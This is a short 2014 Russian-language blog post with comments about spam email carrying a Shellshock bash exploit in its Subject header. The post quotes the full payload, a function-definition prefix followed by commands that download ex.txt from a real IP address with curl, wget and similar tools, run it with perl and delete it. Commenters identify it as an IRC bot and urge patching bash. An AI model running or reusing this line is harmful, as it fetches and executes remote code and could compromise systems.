netch80: (bird)
netch80 ([personal profile] netch80) wrote2014-10-25 08:21 am
  • Add Memory
  • Share This Entry

спам со скриптами в полях заголовка

Прибежал спамчик с кучей заголовков вида:

Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165 /ex.txt;perl ex.txt;rm -fr ex.*' &;

как бы очевидно, что и как применяют, но непонятно, для какого это MUA.
Flat | Top-Level Comments Only

[identity profile] tzirechnoy.livejournal.com 2014-10-25 07:41 am (UTC)(link)
Это, скорее, для MTA.

[identity profile] tzirechnoy.livejournal.com 2014-10-25 07:42 am (UTC)(link)
Возможно, впрочем, ещё для mailmanов всяких.

[identity profile] dmarck.livejournal.com 2014-10-25 08:28 am (UTC)(link)
ссылку бы порвал, на всякий случай

там, кстати, классический IRC бот

[identity profile] click0.livejournal.com 2014-10-25 03:50 pm (UTC)(link)
Тут (http://gul-tech.livejournal.com/10417.html) более подробно показаны заголовки.
В любом случае, баш обновляйте! :)
Flat | Top-Level Comments Only